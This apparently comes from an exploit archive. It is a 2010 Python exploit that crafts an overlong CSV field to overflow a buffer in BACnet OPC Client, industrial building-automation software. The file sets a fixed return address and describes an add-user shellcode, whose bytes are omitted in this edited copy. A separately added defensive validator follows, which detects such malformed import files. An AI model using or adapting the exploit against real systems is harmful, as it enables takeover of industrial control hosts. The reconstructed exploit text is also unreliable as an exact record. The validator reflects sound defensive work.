
[local exploits] - BACnet OPC Client Buffer Overflow Exploit

Posted on 16 September 2010

=========================================
BACnet OPC Client Buffer Overflow Exploit
=========================================

#!/usr/bin/python
# bacnet.py
# BACnet OPC Client Buffer Overflow Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Sept 2010
#
# After communicating via several emails with the vendor, sharing details
# about the vulnerability, as well as proof-of-concept code (I also offered
# to send the exploit code for them to test themselves), it was clear that
# they weren't very interested in fixing the vulnerability. They even ended our
# conversation with "Hi Jeremy, thanks but please don't waste my time.", and
# quickly became unresponsive to further communication. A couple of days later, I
# notified them of my plans to release exploit code to the public, proving
# the vulnerability, since they weren't planning on releasing a fix. They didn't
# respond with anything indicating plans for an update, so maybe this will help.
#
# If you are a customer (they seem to care much more about your concerns), I would
# suggest contacting support at scadaengine.com and asking them to issue a fix.
#
# Successfully tested on Windows XP Service Pack 3 with BACnet OPC Client 1.0.24
#

import sys
import struct

ret = 0x7C96BF33  # jmp esp @ user32.dll

junk = "B" * 185  # filler up to the saved return address

# win32_adduser - PASS=ware EXITFUNC=thread USER=sploit Size=497 Encoder=PexAlphaNum
payload = (
    # The 497-byte PexAlphaNum-encoded shellcode (41 lines of "\x.." string
    # literals) is omitted from this copy; the extracted page had already lost
    # its escape sequences. Left empty so the file-writing logic still runs.
    ""
)

# CSV import format read by the client; the "\n" escapes are reconstructed here,
# the page copy shows only a bare backslash where they stood.
csv1 = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME \n"  # header row
csv2 = "\nscada,0,0, "                                      # trailing valid row

if len(sys.argv) < 2:
    print "Usage: " + sys.argv[0] + " <filename.csv>"
    sys.exit(0)

file = sys.argv[1]
retaddr = struct.pack("<L", ret)
# Second row: overlong OPC_TAG_NAME field overwrites the return address
csv = csv1 + junk + retaddr + "X" * 4 + payload + csv2

try:
    f = open(file, "w")
    f.write(csv)
    f.close()
except IOError, e:
    print e
else:
    print "Open %s in the OPC client to exploit the vulnerability." % file

# Inj3ct0r.com [2010-09-16]
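As an added defender-side example (not part of the original exploit or of the vendor's code), a pre-import validator for the CSV layout the exploit abuses: it flags the overlong OPC_TAG_NAME field, the wrong field count and the binary bytes that the generated file carries. MAX_FIELD_LEN, the field rules and the sample rows are assumptions.

```python
import string

HEADER = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME"
# Assumed sane upper bound for a tag or object name; the exploit's first field is 185+ bytes.
MAX_FIELD_LEN = 64
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def check_bacnet_csv(data):
    """Scan a BACnet OPC import CSV (bytes); return [(line_no, reason), ...], empty if clean."""
    findings = []
    lines = data.split(b"\n")
    if lines[0].strip() != HEADER.encode():
        findings.append((1, "unexpected header"))
    for no, raw in enumerate(lines[1:], start=2):
        if not raw.strip():
            continue  # blank or trailing line
        text = raw.decode("latin-1")  # never fails, so length checks still run on binary rows
        bad = [ch for ch in text if ch not in PRINTABLE]
        if bad:
            findings.append((no, "%d non-printable or non-ASCII bytes" % len(bad)))
        fields = text.rstrip("\r").split(",")
        if len(fields) != 4:
            findings.append((no, "expected 4 fields, got %d" % len(fields)))
        for idx, field in enumerate(fields):
            if len(field) > MAX_FIELD_LEN:
                findings.append((no, "field %d is %d bytes, limit %d" % (idx, len(field), MAX_FIELD_LEN)))
        for idx in (1, 2):  # OBJECT_TYPE and INSTANCE must be integers
            if idx < len(fields) and not fields[idx].strip().isdigit():
                findings.append((no, "field %d is not an integer" % idx))
    return findings


# Constructed samples: a benign import file, and one shaped like the exploit's output
# (185-byte first field, 4 stand-in return-address bytes, "XXXX", a few stand-in
# non-printable bytes in place of shellcode, then the trailing valid row).
BENIGN = HEADER.encode() + b"\nscada,0,0,\nboiler1,8,1,Boiler 1\n"
MALICIOUS = (HEADER.encode() + b" \n" + b"B" * 185 + b"\xde\xad\xbe\xef" + b"XXXX"
             + b"\xeb\xfe\x90" + b"\nscada,0,0, ")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        for line_no, reason in check_bacnet_csv(blob) or [(0, "no findings")]:
            print("%s: line %d: %s" % (name, line_no, reason))
```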
